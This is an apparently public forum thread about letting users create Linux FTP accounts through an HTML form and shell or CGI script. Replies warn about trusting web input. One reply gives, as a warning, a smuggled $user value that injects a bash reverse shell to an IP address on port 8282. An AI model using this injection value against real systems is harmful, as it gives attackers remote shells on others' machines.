so thats a no then on doing it via html form

look into Java script that might help you accomplish this from HTML.

I have not played with javascript in a long long time but you can create buttons and text box for submitting information and etc... as far as it taking to your linux box you might need some mediator between your html and system. but I know they got that too, whatever it is.

you're not the first person that tried this.

I'm rather sure you can do process form data via a shell script. I've done CGI scripts in shell before but they were much simpler and it was a long, long time ago. However, that's the kind of thing you really ought to turn to perl for.

The point that I see several trying to make, and I hope it drives home, is that you cannot and must not in any way trust the data that arrives in your script from the web server. You have to severely process it so that only ASCII is left, if anything. And even then, only a subset. can be allowed.

For example you don't want the following line

to ever be in a situation where someone can set $user equal to "budroe; bash -i >& /dev/tcp/192.0.2.233/8282 0>&1;" or anything else malicious.

By allowing someone to create their own system account on your computer (even if you just mean it to be for FTP), you're basically taking them 3/4 of the way or more towards getting root shell access to your system. If this is something for a corporation and it's behind a well-maintained firewall, then it's probably not so bad, but if it's open to the Internet you're just inviting trouble.

There are FTP systems out there that have their own authentication system, so you don't have to create an actual user for these accounts, plus they chroot() into a special area, etc.

1 members found this post helpful.